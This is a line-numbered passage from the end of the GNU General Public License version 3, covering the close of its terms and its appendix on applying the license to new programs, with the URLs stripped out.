civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | --------------------------------------------------------------------------------